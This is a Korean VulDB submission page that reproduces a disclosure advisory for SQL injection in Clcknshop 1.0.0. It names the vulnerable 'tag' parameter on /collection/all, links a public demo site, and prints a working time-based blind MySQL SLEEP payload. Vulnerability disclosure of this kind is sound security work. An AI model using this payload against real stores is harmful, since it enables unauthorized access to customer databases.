| 제목 | Clcknshop 1.0.0 - SQL Injection |
|---|
| 설명 | # Exploit Title: Clcknshop 1.0.0 - SQL Injection
# Exploit Author: skalvin aka (CraCkEr)
# Date: 16/08/2023
# Vendor: Infosoftbd Solutions
# Vendor Homepage: https://infosoftbd.com/
# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/
# Demo: https://kidszone.clckn.shop/
# Tested on: Windows 10 Pro
# Impact: Database Access
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /collection/all
GET parameter 'tag' is vulnerable to SQL Injection
https://website/collection/all?tag=[SQLi]
---
Parameter: tag (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
---
[-] Done |
|---|
| 사용자 | skalvin (UID 49463) |
|---|
| 제출 | 2023. 08. 16. PM 07:34 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 09. 01. PM 02:34 (16 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 238571 [Infosoftbd Clcknshop 1.0.0 GET Parameter /collection/all 일 SQL 주입] |
|---|
| 포인트들 | 17 |
|---|